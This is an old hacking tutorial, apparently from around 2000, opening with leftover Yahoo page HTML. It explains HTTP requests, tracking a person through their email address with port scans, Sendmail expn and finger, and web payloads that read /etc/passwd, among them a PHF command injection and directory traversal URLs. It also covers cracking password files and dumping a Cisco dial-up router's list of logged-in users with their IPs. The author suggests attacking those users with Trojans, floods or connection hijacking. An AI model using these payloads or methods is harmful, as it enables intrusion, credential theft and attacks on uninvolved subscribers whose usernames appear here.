href="/homer/?http://movies.yahoo.com">Y! Movies</a> - showtimes, reviews,
info</small></td></tr><tr><td valign=top><b>&#183;</b></td><td><small><a
href="/homer/?http://photos.yahoo.com/">Yahoo! Photos</a> - upload, share, 
and
print pictures</small></td></tr><tr><td
valign=top><b>&#183;</b></td><td><small>Play free <a
href="/homer/?http://baseball.fantasysports.yahoo.com/baseball/">Fantasy
Baseball</a></small></td></tr><tr><td 
valign=top><b>&#183;</b></td><td><small><a
href="/homer/?http://geocities.yahoo.com/home/">Yahoo! GeoCities</a> - build
your free home page</small></td></tr><tr><td align=right colspan=2><a
href=r/xi><small>more...</small></a></td></tr></table></td></tr></table>
<table border=0 cellspacing=0 width=600><tr><td bgcolor=339933><table 
border=0
cellspacing=0 cellpadding=0><tr><td
height=2></td></tr></table></td></tr></table>
</form><form action=http://search.local.yahoo.com/zipsearch><table border=0
cellspacing=4 cellpadding=0><tr><td align=right valign=top
nowrap><small><b>World Yahoo!s</b></small></td><td></td><td valign=top
colspan=2><small><i>Europe</i> :
<a href=r/dk>Denmark</a> -
<a href=r/fr>France</a> -
<a href=r/de>Germany</a> -
<a href=r/it>Italy</a> -
<a href=r/no>Norway</a> -
<a href=r/es>Spain</a> -
<a href=r/se>Sweden</a> -
<a href=r/uk>UK & Ireland</a><br><i>Pacific Rim</i> :
<a href=r/ai>Asia</a> -
<a href=r/an>Australia & NZ</a> -
<a href=r/cc><b>China</b></a> -
<a href=r/cn>Chinese</a> -
<a href=r/hk>HK</a> -
<a href=r/jp>Japan</a> -
<a href=r/kr>Korea</a> -
<a href=r/sg>Singapore</a> -
<a href=r/tw>Taiwan</a><br><i>Americas</i> :
<a href=r/ag><b>Argentina</b></a> -
<a href=r/br>Brazil</a> -
<a href=r/cd>Canada</a> -
<a href=r/mx>Mexico</a> -
<a href=r/ep>Spanish</a></small></td></tr><tr><td align=right
nowrap><small><b>Yahoo! Get Local</b></small></td><td></td><td 
nowrap><small><a
href=r/lo>LA</a> -
<a href=r/ny>NYC</a> -
<a href=r/ba>SF Bay</a> -
<a href=r/ch>Chicago</a> -
<a href=r/mm>more...</a> &nbsp;&nbsp;</small></td><td nowrap><small><input
name=q size=5 maxlength=5>&nbsp;<input type=submit value="Enter Zip
Code"></small></td></tr><tr><td align=right valign=top
nowrap><small><b>Other</b></small></td><td></td><td valign=top
colspan=2><small><a href=r/ya>Autos</a> -
<a href=r/em>Careers</a> -
<a href=r/di>Digital</a> -
<a href=r/ye>Entertainment</a> -
<a href=r/le><b>Event Guide</b></a> -
<a href=r/gr>Greetings</a> -
<a href=r/yh>Health</a> -
<a href=r/iv><b>Invites</b></a> -
<a href=r/ne>Net Events</a><br><a href=r/ms>Message Boards</a> -
<a href=r/mv>Movies</a> -
<a href=r/rk>Music</a> -
<a href=r/yr>Real Estate</a> -
<a href=r/sb>Small Business</a> -
<a href=r/il>Y! Internet Life</a> -
<a href=r/yg>Yahooligans!</a></small></td></tr></table></form><table 
border=0
cellspacing=0 width=600><tr><td bgcolor=339933><table border=0 cellspacing=0
cellpadding=0><tr><td height=2></td></tr></table></td></tr></table><table
border=0 cellspacing=6 cellpadding=0><tr><td align=right><a
href=r/vs><small>Yahoo! prefers</small></a></td><td><a href=r/vs><img 
width=37
height=23 border=0
src=http://a1.g.a.yimg.com/7/1/31/000/us.yimg.com/a/vi/visa/sm.gif></a></td></tr
></table><small><a href=r/ad>How to Suggest a Site</a> -
<a href=r/cp>Company Info</a> -
<a href=r/pv>Privacy Policy</a> -
<a href=r/ts>Terms of Service</a> -
<a href=r/cb>Contributors</a> -
<a href=r/hr>Openings at Yahoo!</a><p>Copyright &copy; 2000 Yahoo! Inc. All
rights reserved.<br><a href=r/cy>Copyright
Policy</a></small></center></body></html>


The get method gives the HTML source of the document requested.It seems just 
as if you are seeing the source by clicking View> Source.

Similiarly you can see what happens when you issue the 'PUT' and 'Head'
methods.Just replace 'Get' with the Method that you want to use.For

Example,

head / http/1.1 and put/ http/1.1

****************

Hacking Truth: Let's go back to the response that we got from the HTTP 
daemon once the HTTP Get method was okayed at Yahoo.The first line of the 
response was:

HTTP/1.0 200 OK

Now what does this 200 signify? Well the '200' is called the status
code.Whenever you give the server a HTTP command, it processes the command 
and accrodingly displays a status code.A status code is a 3 digit code in 
the form of xxx. Status codes start from 1xx to 5xx.I am not sure what the 
1xx series signifies as they are rarely used.The 2xx series signify a 
succssful completion of the HTTP command given.The 3xx series signify errors 
due to moving of documents.The 4xx series signify errors caused at browser 
side and finally the 5xx series signify errors at the server side.

The most common status code that you come across, but may not have ever see 
is the 200 OK status code.Each time you are able to see a page on the 
browser successfully, the browser has been sent this status code by the HTTP 
daemon.

The most common errors that you might come across and actually see would be 
the 404 Error---Not Found. This error emssage means that the Url that you 
tying to access is not found, it has either been moved or has been deleted 
or the linking of the web pages itself has not been done properly.I can go 
to the up directory to look for the exact new changed URL.

***************
An email address is pretty much all you need to findout more about a person.
Let's see how one can gather more information by just knowing the email 
address.
Let's take my email address for example,

ankit@bol.net.in

Now normally the string after the '@' sign is the domain name of the ISP 
with which the user is registered.Hence the server of my ISP where you can 
find info on me would become bol.net.in. So you do a Port scan on bol.net.in 
but get the error message, Host Not Found.

Sometimes the string after the '@' sign is not the domain name.Yes the 
server exists, but is probably behind a firewall and normal users do not 
have access to it from an untrusted external Network.So you know wxamine the 
headers of an email sent by me.You see something like the following line in 
almost all emails sent by me and the delhi1.mtnl.net.in thing is always 
there.

Received:  from bol.net.in by delhi1.mtnl.net.in 
(8.9.1/1.1.20.3/26Oct99-0620AM) id OAA0000001463; Thu, 13 Apr 2000 14:28:46 
+0530 (IST)

So you do a Port Scan on delhi1.mtnl.net.in. You find that the following 
Ports are open:

21 FTP
25 SMTP
79 Finger
80 HTTP
110 POP
and more...

The FTP daemon does not give much info on the users.So let's forget it.So 
you move on to the SMTP port. Almost all version of Sendmail allow the 
'vrfy' and the 'expn' commands.The 'vrfy' commands verfies if a particular 
email address is valid or not.The 'expn' command expands a particular email 
address.By that what I mean to say is that it provides additional 
information on the user owning the supplied email address.
For example,if we type the following while connected to Port 25, the server 
might respond with some interesting information on the user.

expn ankit@bol.net.in

For more details refer to the Sendmail Help.
The 'expn' and the 'vrfy' commands are not bugs in Sendmail but the features 
which were orignally meant to do what they do now.Most ISP's have configured 
the Sendmail daemon such that it does not provide any info if it encounters 
these commands.

Port 79 is by default the Finger Port.Unix users might know Finger as a 
command which gives more information about any user on the Internet whose 
email address is known.Unix users can finger a user by simply, typing:

finger email_address@domain_name.com

Windows users can use the DOS Telnet Client to telnet to Port 79.

C:\windows>telnet delhi1.mtnl.net.in 79

(My ISP has disabled the Finger Port so do not even try..)

No matter how you finger someone, you will either get an error message 
saying 'Access Denied' which means that the Finger Port is not open or you 
will be connected to the host with the Finger Daemon waiting for input.
If you use a Windows Finger client (SamSpade I think so...) or Finger from 
Unix then the finger client automatically sends the user name which has to 
be fingered.But if you follow the Telnet method then when the Finger Daemon 
prompts for input, you will have to type the Username.For example,

ankit

The finger daemon would respond something like(I have inserted comments 
after \*

[delhi1.mtnl.net.in]       \* My ISP

Login name: ankit  In real life: Ankit Fadia   \* My Login Name and my real 
Name

Directory: /users/others/ankit     Shell: /bin/ksh     \* The Directory 
where my .plan and other files are stored and my shell type

Last login Fri Dec 8 17:04 on ttyp0 from 202.xx.109.38    \* My Last Login 
Info with last IP

No Plan.     \* Error message as there is no .plan file in my User directory 
i.e. users/others/ankit

When you register with your ISP, You provide them with some info (The form 
that You fill up??).Now a part of this info  is always shown  whenever 
someone fingers you.The additional information  like the Home Address and 
the residence Number, Office address, Office telephone Number etc. are shown 
or provided only if the .plan file exits. So what exactly is a .plan file?

Your home directory which is set by the system administrator contains some 
.plan files which are automatically created when you configure mail clients 
and other services.It also contains this .plan file which is not created 
automatically but the user has to create it himself.Sometimes your system 
administrator might create this file himself.Try to finger yourself and 
ensure that additional information about you is not displayed.If you find 
that fingering yourself gives out a lot of private information about you, 
then you should edit the .plan file or even delete it.

The finger daemon is rarely running on systems nowdays.Even if it is 
running, the system administrators configure it to not display any 
information at all.
The Finger daemon not only unwantingly display important info on the users 
but could also be used to get root.If you are real lucky and find an open 
Finger daemon then I suggest you try the following commands: finger root and 
finger system.

Say you do not even know the email address of a person.You only know the 
domain name he owns.Now you want to find out more about him, what do you do? 
WHOIS holds the key..it will return the email address of the owner of the 
domain name and then you can carry out the same normal process.

Hacking From your Web Browser

Nowdays, most websites use CGI scripts (or sometimes C scripts) .Now these 
scripts are located in the /cgi-bin directory. What we want to do is, to 
download these scripts for further examination or even use these scripts to 
steal Passwords to access password protected parts of the website.

So simply put something like the below in the location bar of your browser 
to access the directory where the scripts are stored.

ftp://www.hostname.com/cgi-bin
ftp://www.hostname.com/../cgi-bin
http://www.hostname.com/cgi-bin

The  ' ../ ' tells Unix systems to go up one directory.On some systems you 
should try '../../' instead.
The most common way to get the password file is to FTP anonymously and check 
if in the /etc directory access to the passwd(password file) is restricted 
or not.If it is not restricted then download the file and firstly unshadow 
it and then crack it.

Some systems have a file called PHF in the /cgi-bin directory which allow 
remote access to all files inlcuding the /etc/passwd file. The following are 
a list of URL's you can try to get the password file:

http://www.hostname.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
http://www.hostname.com/cgi-bin/php.cgi?/etc/passwd
http://www.hostname.com/~root
http://www.hostname.com/cgi-bin/test-cgi?* HTTP/1.0
http://www.hostname.com/cgi-bin/nph-test.cgi?* HTTP/1.0
http://www.hostname.com/samples/search/queryhit.html
http://www.hostname.com/samples/search/webhits.exe
http://www.hostname.com/_vti_pvt/service.pwd
http://www.hostname.com/secret/files/default.asp
ftp://www.hostname.com/etc/passwd
http://www.hostname.com/cgi-bin/htmlscript?../../../../etc/passwd
http://www.hostname.com/cgi-bin/view-source?../../../../../../../etc/passwd

What we want to do is to download the scripts and to examine them as to how 
they can be used to break the normal sequence.CGI Scripts can be used to 
Nuke the host and also to mail the password file to anyone we want.

Post Dial Up Screen Hacking

The Post Dial Up Screen is the black terminal screen that comes up whenever 
you connect to a router, which asks for a Username and Password.After 
authentication, it prompts the user to enter the type of connection i.e. PPP 
or SLIP.This process occurs whenever you dial into your ISP.(Assuming that 
you have enabled the option.)

When most of you connect to the Internet, do not have to go through this 
Post Dial Up Screen.This is because the 'Bring Up the Post Dial Up Screen' 
option is not enabled.To enable the Post Dial Up screen,simply follow the 
following steps:

1. Launch Dial Up Networking
2. Right Click on Your Connection name and select properties.
3. Under the General Tab click on the Configure Button.
4. Click on the Options Tab and select, bring up the Dial Up Screen After 
dialing option.
5. Click OK

So now the next time, when you dial into your ISP, instead of directly 
verifying the Username and Password and connecting you, the Dial Up 
Connection will bring up a Black Window titled 'The Post DialUp Screen.'This 
screen symbolises the fact that we are now connected to the remote router of 
our ISP where the process of authentication takes place.It will ask for the 
Username and Password and once verified, we will get the prompt to specify 
the type of connection.The whole process would be something like:

User Access Verification
Username: ankit
Password:

delhinas4>

When this prompt(NOTE: Instead of delhinas4 your ISP may have something else 
written.) comes, we need to specify the type of connection, we want to 
establish:PPP or SLIP.
So typing PPP:

delhinas4>ppp

will result in my machine establishing a Point to Point 
Protocol(PPP)connection with my ISP.

But we are hackers and we surely do not want to learn how to establish a PPP 
connection.So let's move on to interesting stuff.Like almost all systems on 
the Internet, this router prompt too gives us help.So let's see what happens 
when I ask for help.

delhinas4>help
Help may be requested at any point in a command by entering
a question mark '?'.  If nothing matches, the help list will
be empty and you must backup until entering a '?' shows the
available options.
Two styles of help are provided:
1. Full help is available when you are ready to enter a
   command argument (e.g. 'show ?') and describes each possible
   argument.
2. Partial help is provided when an abbreviated argument is entered
   and you want to know what arguments match the input
   (e.g. 'show pr?'.)

So let me try typing simply, '?'.

delhinas4>?
Exec commands:
  access-enable    Create a temporary Access-List entry
  access-profile   Apply user-profile to interface
  clear            Reset functions
  connect          Open a terminal connection
  disable          Turn off privileged commands
  disconnect       Disconnect an existing network connection
  enable           Turn on privileged commands
  exit             Exit from the EXEC
  help             Description of the interactive help system
  lock             Lock the terminal
  login            Log in as a particular user
  logout           Exit from the EXEC
  mrinfo           Request neighbor and version information from a multicast
                   router
  mstat            Show statistics after multiple multicast traceroutes
  mtrace           Trace reverse multicast path from destination to source
  name-connection  Name an existing network connection
  pad              Open a X.29 PAD connection
  ping             Send echo messages
  ppp              Start IETF Point-to-Point Protocol (PPP)
  resume           Resume an active network connection
--More--                             rlogin           Open an rlogin 
connection
  show             Show running system information
  slip             Start Serial-line IP (SLIP)
  systat           Display information about terminal lines
  telnet           Open a telnet connection
  terminal         Set terminal line parameters
  traceroute       Trace route to destination
  tunnel           Open a tunnel connection
  where            List active connections
  x28              Become an X.28 PAD
  x3               Set X.3 parameters on PAD

Wow!!! I got a whole list of allowed commands and also a single line 
description of each command.The router that we are connected to provides 
help on specific commands too.Anyway, let's try some kewl commands which 
reveal some very very useful info.I have inserted comments, wherever 
needed.The commands I type begin with the delhinas4> prompt.

delhinas4>




mrinfo
% Timed out receiving response

[Editor:Well the mrinfo command is supposed to get info from routers, but 
unfortunately it always times out when I try it on my ISP, so let's try 
giving the famous systat command.]

delhinas4>systat

    Line     User      Host(s)                  Idle Location
   3 tty 3   tkdutta   Async interface      00:00:05
   4 tty 4   mmanoj    Async interface      00:01:13
   6 tty 6   mpshukla  Async interface      00:04:38
  10 tty 10  chawlaep  Async interface      00:00:01
  14 tty 14  techshar  Async interface      00:00:00
  15 tty 15  dscl      Async interface      00:00:34
  17 tty 17  utility   Async interface      00:00:28
  19 tty 19  saraswti  Async interface      00:00:07
  25 tty 25  affvvdel  Async interface      00:12:48
  26 tty 26  sanjiv3   Async interface      00:00:00
  27 tty 27  vvs       Async interface      00:00:00
  28 tty 28  herz1313  Async interface      00:00:00
  31 tty 31  neccinfo  Async interface      00:00:01
  32 tty 32  gmmm      Async interface      00:00:07
  35 tty 35  cebw      Async interface      00:00:00
  37 tty 37  delhinet  Async interface      00:00:00
  40 tty 40  digdelhi  Async interface      00:01:14
  47 tty 47  giansu    Async interface      00:00:06
  50 tty 50  tafazal   Async interface      00:00:01
  51 tty 51  translnk  Async interface      00:00:02
  52 tty 52  procurez  Async interface      00:05:14
  53 tty 53  triden    Async interface      00:00:05
--More--                               Line     User      Host(s)            
       Idle Location

  56 tty 56  prerna    Async interface      00:00:00
  58 tty 58  saroj     Async interface      00:03:18
* 61 tty 61  ankit     idle                 00:00:01
  68 tty 68  veekay    Async interface      00:00:24
  70 tty 70  kachi     Async interface      00:00:01
  74 tty 74  aqmohan   Async interface      00:00:07
  78 tty 78  mmdutta   Async interface      00:00:00
  81 tty 81  ks1assoc  Async interface      00:00:00
  87 tty 87  adinfo    Async interface      00:00:35
  88 tty 88  anni      Async interface      00:00:00
  89 tty 89  drrajive  Async interface      00:00:04
107 tty 107 orienapp  Async interface      00:00:34
109 tty 109 hmsdir    Async interface      00:00:01
110 tty 110 anandpro  Async interface      00:00:01
112 tty 112 guptalam  Async interface      00:00:12
113 tty 113 airtalks  Async interface      00:00:02
115 tty 115 yatish    Async interface      00:00:27
117 tty 117 ttlnet4   Async interface      00:00:05
118 tty 118 dgmodlxr  Async interface      00:00:00
120 tty 120 cdacd     Async interface      00:00:00

The systat command gives us a list of currently logged on users.From the 
output, I now know their Usernames (and email addresses obviously.)and the 
Time for which they have been online.But this info is not that useful, so 
let's try out the 'who' command.Note the '*' preceeding the Username with 
which I have logged into this router.

delhinas4>who

delhinas5>who
    Line      User       Host(s)              Idle Location
  14 tty 14   jbagga     Async interface      00:00:00 PPP: 203.xx.248.119
  15 tty 15   ptat       Async interface      00:03:33 PPP: 203.xx.248.151
  16 tty 16   dlgrp      Async interface      00:00:00 PPP: 203.xx.248.70
  19 tty 19   viprirag   Async interface      00:00:02 PPP: 203.xx.248.2
  22 tty 22   uaedcnd    Async interface      00:00:00 PPP: 203.xx.248.147
  28 tty 28   entasis    Async interface      00:00:34 PPP: 203.xx.248.140
  29 tty 29   ehircrc    Async interface      00:00:00 PPP: 203.xx.248.137
  34 tty 34   najiaero   Async interface      00:10:07 PPP: 203.xx.248.221
  37 tty 37   amritp     Async interface      00:00:40 PPP: 203.xx.248.50
  39 tty 39   bagris     Async interface      00:00:00 PPP: 203.xx.248.143
  40 tty 40   manish11   Async interface      00:00:00 PPP: 203.xx.248.233
  42 tty 42   sunilg     Async interface      00:00:00 PPP: 203.xx.248.76
  48 tty 48   dreamtec   Async interface      00:00:20 PPP: 203.xx.248.5
  50 tty 50   iii111     Async interface      00:00:01 PPP: 203.xx.248.187
  53 tty 53   azure      Async interface      00:00:00 PPP: 203.xx.248.186
  55 tty 55   gsubbn     Async interface      00:00:00 PPP: 203.xx.248.83
  62 tty 62   tubetool   Async interface      00:01:33 PPP: 203.xx.248.169
  64 tty 64   neratele   Async interface      00:01:10 PPP: 203.xx.248.124
  65 tty 65   grecy      Async interface      00:00:00 PPP: 203.xx.248.208
  68 tty 68   ians       Async interface      00:00:55 PPP: 203.xx.248.194
  70 tty 70   prabal     Async interface      00:00:06 PPP: 203.xx.248.1
  71 tty 71   kwkicd     Async interface      00:00:08 PPP: 203.xx.248.155
--More--                               Line      User       Host(s)          
     Idle Location

  73 tty 73   seco1      Async interface      00:00:01 PPP: 203.xx.248.230
  74 tty 74   neelamm    Async interface      00:00:00 PPP: 203.xx.248.32
  75 tty 75   ukiran     Async interface      00:00:07 PPP: 203.xx.248.53
  76 tty 76   anandtsg   Async interface      00:00:55 PPP: 203.xx.248.160
  85 tty 85   avntin     Async interface      00:06:14 PPP: 203.xx.248.126
  87 tty 87   pnddelhi   Async interface      00:00:00 PPP: 203.xx.248.144
  88 tty 88   spph       Async interface      00:00:02 PPP: 203.xx.248.108
* 89 tty 89   ankit      idle                 00:00:00
  92 tty 92   krsawhny   Async interface      00:00:14 PPP: 203.xx.248.192
  94 tty 94   kashyaps   Async interface      00:00:13 PPP: 203.xx.248.117
  95 tty 95   slalklal   Async interface      00:00:00 PPP: 203.xx.248.146
100 tty 100  computer   Async interface      00:00:04 PPP: 203.xx.248.228
101 tty 101  kanchan1   Async interface      00:00:25 PPP: 203.xx.248.178
102 tty 102  kanhya     Async interface      00:00:38 PPP: 203.xx.248.99
103 tty 103  dsidc      Async interface      00:00:00 PPP: 203.xx.248.225
104 tty 104  nsl        Async interface      00:00:00 PPP: 203.xx.248.152
106 tty 106  iconint    Async interface      00:00:00 PPP: 203.xx.248.222
113 tty 113  atri       Async interface      00:00:00 PPP: 203.xx.248.85
117 tty 117  striker    Async interface      00:00:00 PPP: 203.xx.248.30
118 tty 118  coin       Async interface      00:01:01 PPP: 203.xx.248.231
120 tty 120  snwadhwa   Async interface      00:00:00 PPP: 203.xx.248.66
123 tty 123  prithvib   Async interface      00:00:00 PPP: 203.xx.248.67
--More--                               Line      User       Host(s)          
     Idle Location

124 tty 124  itssupp    Async interface      00:00:02 PPP: 203.xx.248.93
125 tty 125  jukebox    Async interface      00:03:45 PPP: 203.xx.248.44
129 tty 129  pwhelan    Async interface      00:00:04 PPP: 203.xx.248.106
134 tty 134  kapil1     Async interface      00:00:02 PPP: 203.xx.248.215
142 tty 142  infoplex   Async interface      00:00:03 PPP: 203.xx.248.159
143 tty 143  tanya74    Async interface      00:00:00 PPP: 203.xx.248.88
150 tty 150  kapuras    Async interface      00:00:33 PPP: 203.xx.248.65
154 tty 154  mpliwal    Async interface      00:00:46 PPP: 203.xx.248.94
155 tty 155  aatishi    Async interface      00:00:00 PPP: 203.xx.248.179
156 tty 156  gcdmrc     Async interface      00:00:00 PPP: 203.xx.248.205
164 tty 164  mland      Async interface      00:00:00 PPP: 203.xx.248.61
168 tty 168  creation   Async interface      00:03:10 PPP: 203.xx.248.55
169 tty 169  dgupta     Async interface      00:00:02 PPP: 203.xx.248.29
173 tty 173  skylink    Async interface      00:00:04 PPP: 203.xx.248.120
175 tty 175  rsystems   Async interface      00:00:01 PPP: 203.xx.248.75
183 tty 183  hmpl       Async interface      00:00:00 PPP: 203.xx.248.19
185 tty 185  dartinc    Async interface      00:00:13 PPP: 203.xx.248.114
187 tty 187  rajive     Async interface      00:00:02 PPP: 203.xx.248.204
189 tty 189  clinepi    Async interface      00:00:46 PPP: 203.xx.248.72
191 tty 191  sammy      Async interface      01:01:00 PPP: 203.xx.248.42
192 tty 192  atrish     Async interface      00:01:47 PPP: 203.xx.248.176
202 tty 202  skylink    Async interface      00:00:12 PPP: 203.xx.248.118
--More--                               Line      User       Host(s)          
     Idle Location

207 tty 207  recom      Async interface      00:00:01 PPP: 203.xx.248.35
211 tty 211  pusapoly   Async interface      00:01:52 PPP: 203.xx.248.91
212 tty 212  rkglobal   Async interface      00:00:57 PPP: 203.xx.248.36
219 tty 219  arajan     Async interface      00:00:03
221 tty 221  sudhanju   Async interface      00:00:00 PPP: 203.xx.248.102
225 tty 225  kkapahi    Async interface      00:00:03 PPP: 203.xx.248.142
226 tty 226  lbsbra     Async interface      00:00:00 PPP: 203.xx.248.183
227 tty 227  humra1k    Async interface      00:00:01 PPP: 203.xx.248.64
239 tty 239  adcr       Async interface      00:00:08 PPP: 203.xx.248.52
  Vi2         exhibind   Virtual PPP (Bundle) 00:00:27
  Vi3         genpr      Virtual PPP (Bundle) 00:09:14
  Vi4         netcafe    Virtual PPP (Bundle) 00:00:00
  Vi6         bcddel     Virtual PPP (Bundle) 00:00:00
  Se6:4       cbidelzo   Sync PPP             00:00:00
  Se6:5       websityg   Sync PPP             00:00:00
  Se6:7       genpr      Sync PPP                    -
  Se6:11      bcddel     Sync PPP                    -
  Se6:12      exhibind   Sync PPP                    -
  Se6:14      samair     Sync PPP             00:00:03
  Se6:19      gosind     Sync PPP             00:00:01
  Se6:26      netcafe    Sync PPP                    -

  Interface  User      Mode                     Idle Peer Address

Now, what was that? Well not only did the 'who' command display the 
Usernames and the time online, but it also displayed the IP's of all people 
online.Now all you need to do is send a Trojan or something and start 
controling the victim's computer.Or maybe try some DOS attacks or even start 
ping flooding the victim.
One may also send the disconnect string to the victim's modem to disconnect 
him or maybe even Hijack his connection.We will learn about this in a later 
issue.

Usually the systat and the who command 'who' command show display the same 
results, but on my ISP, they brought about different varied results.
Another valuable command is the 'show' command which when used with the 
'version' parameter displays the version of the OS running on the remote 
Router
In this case I find that my ISP has Cisco Routers running the Cisco OS.
Now any hacker can easily look for a hole in this particular version of OS 
running on the Router and get root previledges.

delhinas4>show version

Cisco Internetwork Operating System Software
IOS (tm) 5300 Software (C5300-I-M), Version 11.3(9)T,  RELEASE SOFTWARE 
(fc1)
Copyright (c) 1986-1999 by cisco Systems, Inc.
Compiled Thu 08-Apr-99 10:54 by pwade
Image text-base: 0x60008920, data-base: 0x60550000

ROM: System Bootstrap, Version 11.2(9)XA, RELEASE SOFTWARE (fc2)
BOOTFLASH: 5300 Software (C5300-D-M), Version 11.3(9.2)T,  MAINTENANCE 
INTERIM SOFTWARE

delhinas4 uptime is 7 weeks, 1 day, 7 hours, 52 minutes
System restarted by power-on
System image file is "flash:c5300-i-mz_113-9_T.bin", booted via flash

cisco AS5300 (R4K) processor (revision A.32) with 32768K/16384K bytes of 
memory.
Processor board ID 11494401
R4700 processor, Implementation 33, Revision 1.0 (512KB Level 2 Cache)
Channelized E1, Version 1.0.
Bridging software.
X.25 software, Version 3.0.0.
Primary Rate ISDN software, Version 1.1.
Backplane revision 2
Manufacture Cookie Info:
EEPROM Type 0x0001, EEPROM Version 0x01, Board ID 0x30,
--More--                            Board Hardware Version 1.64, Item Number 
800-2544-2,
Board Revision B0, Serial Number 11494401,
PLD/ISP Version 0.0, Manufacture Date 8-Dec-1998.
1 Ethernet/IEEE 802.3 interface(s)
1 FastEthernet/IEEE 802.3 interface(s)
31 Serial network interface(s)
120 terminal line(s)
4 Channelized E1/PRI port(s)
128K bytes of non-volatile configuration memory.
8192K bytes of processor board System flash (Read/Write)
4096K bytes of processor board Boot flash (Read/Write)

Configuration register is 0x2102

The show command has some very useful paramters which can be used to get a 
lot of info.To get an entire list of parameters and a single line 
description, type:

delhinas4>show ?
  WORD           Flash device information - format <dev:>[partition]
  bootflash      Boot Flash information
  calendar       Display the hardware calendar
  clock          Display the system clock
  context        Show context information
  dialer         Dialer parameters and statistics
  history        Display the session command history
  hosts          IP domain-name, lookup style, nameservers, and host table
  isdn           ISDN information
  location       Display the system location
  modem          Modem Management or CSM information
  modemcap       Show Modem Capabilities database
  ppp            PPP parameters and statistics
  rmon           rmon statistics
  sessions       Information about Telnet connections
  snmp           snmp statistics
  tacacs         Shows tacacs+ server statistics
  tdm            TDM connection information
  terminal       Display terminal configuration parameters
  traffic-shape  traffic rate shaping configuration
  users          Display information about terminal lines
  version        System hardware and software status
--More--                           
The following are the results that I get when I try out the kewl parameters 
of the show command.

delhinas4>show calendar
16:19:06 UTC Sun Apr 16 2000

delhinas4>show hosts
Default domain is bol.net.in
Name/address lookup uses domain service
Name servers are 203.xx.243.70, 203.xx.227.70

Host                     Flags      Age Type   Address(es)

delhinas4>show modem

        Avg Hold     Inc calls     Out calls    Busied   Failed    No     
Succ
  Mdm     Time      Succ   Fail   Succ   Fail    Out      Dial   Answer   
Pct.
  1/0   00:10:43    1375    375      0      0       0        0     125     
78%
  1/1   00:10:52    1392    370      0      0       0        2     126     
79%
* 1/2   00:11:36    1388    329      0      0       0        0     100     
80%
* 1/3   00:12:19    1347    328      0      0       0        0     114     
80%
  1/4   00:12:34    1326    334      0      0       0        2     101     
79%
* 1/5   00:11:30    1375    341      0      0       0        1      85     
80%
  1/6   00:12:26    1358    326      0      0       0        3      94     
80%
* 1/7   00:11:20    1402    322      0      0       0        1      96     
81%
* 1/8   00:11:26    1388    335      0      0       0        1     107     
80%
  1/9   00:13:05    1328    313      0      0       0        3     111     
80%
  1/10  00:10:59    1402    336      0      0       0        0     107     
80%
  1/11  00:12:31    1349    323      0      0       0        1     115     
80%
  1/12  00:13:12    1303    309      0      0       0        6      96     
80%
* 1/13  00:12:11    1339    337      0      0       0        2     103     
79%
* 1/14  00:11:08    1398    337      0      0       0        2     103     
80%
  1/15  00:12:28    1328    342      0      0       0        3      96     
79%
* 1/16  00:11:18    1416    320      0      0       0        2      96     
81%
  1/17  00:11:41    1118    275      0      0       0        1      84     
80%
* 1/18  00:12:03    1324    352      0      0       0        2     106     
78%
  1/19  00:11:29    1369    371      0      0       0        1     120     
78%
  1/20  00:11:25    1323    372      0      0       0        2     109     
78%
--More--                             1/21  00:10:40    1431    340      0    
   0       0        2     111     80%
  1/22  00:12:12    1343    329      0      0       0        3     101     
80%
  1/23  00:11:40    1363    330      0      0       0        0     102     
80%
* 1/24  00:12:22    1340    317      0      0       0        0     113     
80%
* 1/25  00:11:36    1383    348      0      0       0        3     128     
79%
* 1/26  00:14:09    1297    294      0      0       0        1      99     
81%
* 1/27  00:10:25    1436    359      0      0       0        1     103     
80%
  1/28  00:11:08    1411    331      0      0       0        1      95     
80%
  1/29  00:10:25    1438    343      0      0       0        0      99     
80%
* 1/30  00:10:35    1443    352      0      0       0        2     104     
80%
* 1/31  00:11:06    1434    325      0      0       0        0     108     
81%
  1/32  00:11:30    1379    358      0      0       0        0     122     
79%
  1/33  00:11:04    1406    345      0      0       0        2     107     
80%
* 1/34  00:12:38    1321    338      0      0       0        0     105     
79%
  1/35  00:12:14    1346    326      0      0       0        2     104     
80%
* 1/36  00:11:13    1400    333      0      0       0        0     101     
80%
  1/37  00:11:52    1338    363      0      0       0        1      99     
78%
  1/38  00:13:19    1262    322      0      0       0        0     113     
79%
* 1/39  00:11:39    1366    341      0      0       0        2      93     
80%
  1/40  00:10:34    1380    396      0      0       0        0     122     
77%
  1/41  00:10:36    1417    356      0      0       0        0     115     
79%
  1/42  00:11:16    1404    306      0      0       1        3      95     
82%
  1/43  00:11:43    1418    326      0      0       1        1     106     
81%
--More--                             1/44  00:11:25    1347    367      0    
   0       1        2     105     78%
  1/45  00:11:22    1371    362      0      0       1        0     111     
79%
* 1/46  00:12:08    1326    340      0      0       1        1      92     
79%
  1/47  00:11:47    1365    358      0      0       1        1     111     
79%
* 1/48  00:11:35    1359    341      0      0       0        2      98     
79%
  1/49  00:11:12    1376    359      0      0       0        2      99     
79%
* 1/50  00:12:10    1370    345      0      0       0        4     109     
79%
* 1/51  00:12:00    1375    319      0      0       0        2     117     
81%
* 1/52  00:11:41    1390    322      0      0       0        0      98     
81%
  1/53  00:12:49    1330    330      0      0       0        0      98     
80%
  1/54  00:11:35    1396    327      0      0       0        2      92     
81%
* 1/55  00:12:43    1354    301      0      0       0        1      83     
81%
  1/56  00:11:31    1379    341      0      0       0        1     109     
80%
  1/57  00:12:00    1369    324      0      0       0        2      96     
80%
  1/58  00:12:03    1342    361      0      0       0        0     103     
78%
  1/59  00:12:17    1305    349      0      0       0        1     101     
78%
* 2/0   00:12:11    1337    362      0      0       0        0     107     
78%
  2/1   00:14:01    1251    322      0      0       0        2      98     
79%
  2/2   00:12:34    1328    322      0      0       0        0     109     
80%
  2/3   00:12:24    1358    318      0      0       0        0     105     
81%
  2/4   00:12:24    1356    309      0      0       0        0      97     
81%
  2/5   00:10:14    1451    344      0      0       0        1     103     
80%
  2/6   00:12:18    1333    340      0      0       0        0     105     
79%
--More--                           * 2/7   00:12:35    1333    335      0    
   0       0        0     108     79%
  2/8   00:11:17    1427    346      0      0       0        1     129     
80%
* 2/9   00:12:07    1361    299      0      0       0        0      95     
81%
  2/10  00:10:47    1407    370      0      0       0        0      98     
79%
  2/11  00:11:07    1409    333      0      0       0        2     102     
80%
  2/12  00:10:51    1444    323      0      0       0        2     110     
81%
* 2/13  00:10:11    1393    406      0      0       0        3     115     
77%
  2/14  00:12:31    1228    315      0      0       0        2     110     
79%
